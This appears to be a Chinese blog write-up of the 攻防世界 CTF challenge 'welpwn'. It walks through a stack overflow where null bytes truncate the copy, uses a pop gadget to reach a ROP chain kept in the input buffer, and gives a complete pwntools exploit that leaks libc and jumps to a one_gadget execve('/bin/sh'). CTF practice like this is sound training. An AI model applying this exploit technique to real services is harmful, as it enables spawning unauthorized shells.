攻防世界 pwn welpwn

　　感觉好久没有水博客了，今天借助这道题来告诉自己做pwn题要多调试！！！

　　先检查了保护只开启了堆栈不可执行，接下来ida看一下伪代码：

　　这里可以往buf进行写入，接下来看一下echo函数：

　　大概意思就是将buf的内容写入s2中，s2距离rbp只有0x10，所以可以进行溢出。这里我刚开始的时候是直接构造的rop，leakbaselibc，但是一直没有回显。后来我又将返回地址写成了start看看能不能让程序再次执行，发现是可以的。后来检查了一下，发现是向s2中赋值的时候，遇到'\x00'就会中断for循环，所以不能构造rop链。这可怎么办，看了大佬们的博客，然后我也试着调试了一下。

　　这里可以看到，当我们输入aaaaaaaa的时候，首先是存在buf中，然后调用echo函数的时候赋值给了s2，所以s2的值也是aaaaaaaa，这里很明显可以看到两个变量在栈中的距离是0x20。

　　此时的栈空间布局大概就是如图了，那我们应该怎么办呢？那就是利用栈连续，来构造rop链。将返回地址覆盖成pop|ret就可以执行leaklibc了。

　　栈的布局就是上面这个图了，贴一下我的exp：

 1 from pwn import *
 2
 3 p = process('./welpwn')
 4 elf = ELF('./welpwn')
 5 context.log_level = 'debug'
 6
 7 start = elf.symbols['_start']
 8 write_got = elf.got['write']
 9 puts_plt = elf.plt['puts']
10 pop_rdi = 0x004008a3
11 ret = 0x0400589
12 pop_four = 0x0040089c
13
14 payload = 'a'*0x10 + 'bbbbbbbb' + p64(pop_four)
15 payload += p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(start)
16 p.sendlineafter('RCTF\n',payload)
17 sleep(1)
18 p.recv(0x2b)
19 write_addr = u64(p.recv(6).ljust(8,'\x00'))
20 print hex(write_addr)
21
22 base_addr = write_addr - 0x0f72b0
23 shell_addr = base_addr + 0xf02a4
24
25 payload = 'a'*0x10 + 'bbbbbbbb' + p64(pop_four)
26 payload += p64(shell_addr)
27 p.sendline(payload)
28 sleep(1)
29 p.interactive()
30 '''
31 0x45216 execve("/bin/sh", rsp+0x30, environ)
32 constraints:
33   rax == NULL
34
35 0x4526a execve("/bin/sh", rsp+0x30, environ)
36 constraints:
37   [rsp+0x30] == NULL
38
39 0xf02a4 execve("/bin/sh", rsp+0x50, environ)
40 constraints:
41   [rsp+0x50] == NULL
42
43 0xf1147 execve("/bin/sh", rsp+0x70, environ)
44 constraints:
45   [rsp+0x70] == NULL
46 '''

　　我看师傅们还有用DynELF做的，我大概看了一下，发现也是leak地址然后找system的地址，以前也经常听师傅们说这个东西，但是我目前还没遇到说必须用那个东西做的题，就不复现那种方法了。感觉都差不多。